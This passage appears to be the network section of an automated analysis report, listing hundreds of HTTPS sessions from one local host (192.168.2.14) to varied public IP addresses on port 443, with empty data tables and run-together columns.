                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25414192.168.2.1436250140.88.215.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25415192.168.2.1455016221.54.200.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25416192.168.2.1458056210.38.10.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25417192.168.2.1440580111.111.117.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25418192.168.2.144630893.59.11.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25419192.168.2.1436082166.155.210.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25420192.168.2.1443232209.34.155.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25421192.168.2.1446072189.44.144.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25422192.168.2.1443120169.215.170.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25423192.168.2.1452362116.198.131.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25424192.168.2.144625812.108.182.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25425192.168.2.1435788161.97.192.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25426192.168.2.145266298.148.181.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25427192.168.2.143739660.23.25.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25428192.168.2.143552841.112.189.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25429192.168.2.1447952101.198.188.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25430192.168.2.143320486.47.212.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25431192.168.2.1447456125.194.112.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25432192.168.2.1441334198.65.155.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25433192.168.2.1454036160.178.52.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25434192.168.2.143514014.134.82.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25435192.168.2.144921478.21.112.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25436192.168.2.1434592166.91.22.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25437192.168.2.145001451.221.195.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25438192.168.2.1453176153.28.68.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25439192.168.2.144917890.219.233.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25440192.168.2.144484269.101.3.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25441192.168.2.1434412134.203.163.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25442192.168.2.145037661.229.216.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25443192.168.2.145398058.65.129.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25444192.168.2.143593853.70.248.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25445192.168.2.144867443.120.180.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25446192.168.2.143400263.121.218.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25447192.168.2.1457386198.55.134.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25448192.168.2.1455740182.189.243.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25449192.168.2.1434362187.237.101.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25450192.168.2.1438884178.246.133.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25451192.168.2.1433470120.141.17.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25452192.168.2.144679638.93.213.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25453192.168.2.1455586105.54.33.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25454192.168.2.143807025.209.111.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25455192.168.2.1456398110.110.180.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25456192.168.2.1449756160.140.208.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25457192.168.2.1439798192.74.241.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25458192.168.2.1458012159.209.75.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25459192.168.2.1453346162.126.213.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25460192.168.2.1435110133.60.237.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25461192.168.2.1459164198.39.245.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25462192.168.2.1435528203.48.151.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25463192.168.2.1453882204.74.240.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25464192.168.2.1457286190.113.71.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25465192.168.2.145792414.24.17.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25466192.168.2.1456542148.55.236.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25467192.168.2.1452380223.195.140.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25468192.168.2.143412861.76.22.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25469192.168.2.145943445.10.16.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25470192.168.2.1446632145.247.106.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25471192.168.2.145630098.125.188.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25472192.168.2.1456342189.19.244.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25473192.168.2.1442446105.1.194.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25474192.168.2.145997612.116.43.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25475192.168.2.144617089.106.131.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25476192.168.2.1451424206.37.64.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25477192.168.2.145570491.159.233.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25478192.168.2.145865435.146.143.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25479192.168.2.1456258160.178.110.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25480192.168.2.143651045.114.29.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25481192.168.2.1453900213.138.59.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25482192.168.2.1443144201.137.148.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25483192.168.2.1456284120.112.51.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25484192.168.2.143856074.169.61.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25485192.168.2.1433048142.249.112.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25486192.168.2.1434380119.223.156.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25487192.168.2.1438798189.48.127.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25488192.168.2.145032427.45.242.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25489192.168.2.1432954130.64.145.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25490192.168.2.144955463.111.40.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25491192.168.2.1443554120.88.232.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25492192.168.2.1451832170.144.15.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25493192.168.2.145137476.208.157.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25494192.168.2.1456454212.116.19.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25495192.168.2.1440594150.83.209.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25496192.168.2.1453134212.193.23.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25497192.168.2.1439510129.175.50.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25498192.168.2.1452606108.212.122.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25499192.168.2.1457170126.85.9.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25500192.168.2.144674071.143.59.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25501192.168.2.144499670.71.124.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25502192.168.2.145152034.182.59.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25503192.168.2.1453212213.4.138.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25504192.168.2.144367041.114.205.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25505192.168.2.1451830119.167.200.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25506192.168.2.145222034.25.171.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25507192.168.2.1459630178.60.140.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25508192.168.2.1455432195.240.21.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25509192.168.2.1435116130.243.132.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25510192.168.2.1439444210.46.157.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25511192.168.2.144741087.84.182.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25512192.168.2.1456934160.249.140.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25513192.168.2.144715078.22.199.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25514192.168.2.1435484121.237.100.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25515192.168.2.145382813.16.125.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25516192.168.2.145166045.21.178.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25517192.168.2.1450480166.166.28.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25518192.168.2.1454928112.223.211.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25519192.168.2.1443190205.205.67.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25520192.168.2.144035027.5.43.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25521192.168.2.1433694209.181.20.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25522192.168.2.1436810108.165.75.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25523192.168.2.1434010129.89.199.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25524192.168.2.1460212199.96.129.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25525192.168.2.1433016153.1.214.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25526192.168.2.1455588194.63.33.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25527192.168.2.145968495.48.215.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25528192.168.2.1452498198.243.93.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25529192.168.2.1454540178.132.155.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25530192.168.2.144841077.214.90.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25531192.168.2.1456710146.169.2.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25532192.168.2.145747290.24.120.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25533192.168.2.1435158146.136.86.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25534192.168.2.1452152218.189.14.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25535192.168.2.144076840.216.2.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25536192.168.2.1437634139.189.23.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25537192.168.2.1454290182.102.125.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25538192.168.2.145689034.134.217.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25539192.168.2.1453416123.208.218.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25540192.168.2.143820251.35.180.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25541192.168.2.143791845.231.174.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25542192.168.2.144809880.89.81.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25543192.168.2.1459198156.129.248.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25544192.168.2.1454050149.166.130.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25545192.168.2.145053843.53.22.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25546192.168.2.1447724195.246.4.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25547192.168.2.1435790150.120.15.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25548192.168.2.1435798165.191.101.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25549192.168.2.144816265.208.224.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25550192.168.2.144780081.72.172.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25551192.168.2.1436034165.192.117.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25552192.168.2.1444406140.113.230.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25553192.168.2.1435256116.78.41.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25554192.168.2.1433458212.231.102.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25555192.168.2.1459498161.86.20.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25556192.168.2.144879299.173.95.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25557192.168.2.1443090209.25.109.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25558192.168.2.145829824.35.179.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25559192.168.2.144363658.25.203.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25560192.168.2.1441104192.163.13.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25561192.168.2.144598034.30.230.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25562192.168.2.1455414177.212.171.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25563192.168.2.1459532101.117.28.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25564192.168.2.1440052196.112.188.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25565192.168.2.14536024.35.2.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25566192.168.2.1452334186.104.131.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25567192.168.2.1444214152.251.156.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25568192.168.2.1448826165.187.186.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25569192.168.2.1444582185.195.144.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25570192.168.2.1432816184.171.189.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25571192.168.2.145014050.237.92.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25572192.168.2.1452450166.78.157.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25573192.168.2.1439668207.9.250.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25574192.168.2.145308885.74.157.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25575192.168.2.1446216104.154.116.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25576192.168.2.143794227.214.79.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25577192.168.2.1443738102.173.102.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25578192.168.2.1458808220.74.111.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25579192.168.2.144624632.12.222.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25580192.168.2.145490453.201.62.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25581192.168.2.1449612112.128.4.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25582192.168.2.143392661.150.204.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25583192.168.2.1434890128.219.25.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25584192.168.2.1436970177.35.219.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25585192.168.2.145425677.135.101.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25586192.168.2.143977240.7.96.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25587192.168.2.1436844168.93.110.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25588192.168.2.1448606176.99.186.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25589192.168.2.1437912193.178.41.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25590192.168.2.1447672195.217.241.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25591192.168.2.1441634208.27.83.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25592192.168.2.144423276.129.233.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25593192.168.2.1441246201.23.212.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25594192.168.2.145777272.193.68.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25595192.168.2.145914224.131.209.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25596192.168.2.1434782166.11.68.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25597192.168.2.1456570151.20.203.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25598192.168.2.1447326208.25.36.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25599192.168.2.143502232.250.219.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25600192.168.2.145676278.173.181.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25601192.168.2.1437644176.195.221.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25602192.168.2.1441402104.0.195.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25603192.168.2.1446988222.25.13.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25604192.168.2.145643020.237.21.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25605192.168.2.1434708199.67.126.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25606192.168.2.143824887.51.133.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25607192.168.2.145931882.49.227.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25608192.168.2.144998061.30.241.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25609192.168.2.1438798132.211.31.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25610192.168.2.144100214.201.57.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25611192.168.2.144739077.92.38.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25612192.168.2.145643849.72.224.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25613192.168.2.1444214148.21.62.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25614192.168.2.1447744190.247.89.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25615192.168.2.143588235.61.60.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25616192.168.2.1438596159.36.114.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25617192.168.2.14596381.18.253.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25618192.168.2.1436404146.209.191.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25619192.168.2.145901049.231.131.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25620192.168.2.1449388170.7.215.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25621192.168.2.1459042134.185.214.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25622192.168.2.1449920140.249.135.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25623192.168.2.1450852114.205.98.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25624192.168.2.1451730216.204.63.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25625192.168.2.1434912221.248.50.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25626192.168.2.1450650210.194.205.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25627192.168.2.1447908147.93.130.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25628192.168.2.1444832113.76.120.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25629192.168.2.1456622174.254.228.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25630192.168.2.1445382219.97.139.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25631192.168.2.143499244.31.21.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25632192.168.2.143480637.201.125.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25633192.168.2.1447582111.97.126.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25634192.168.2.1449348120.208.127.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
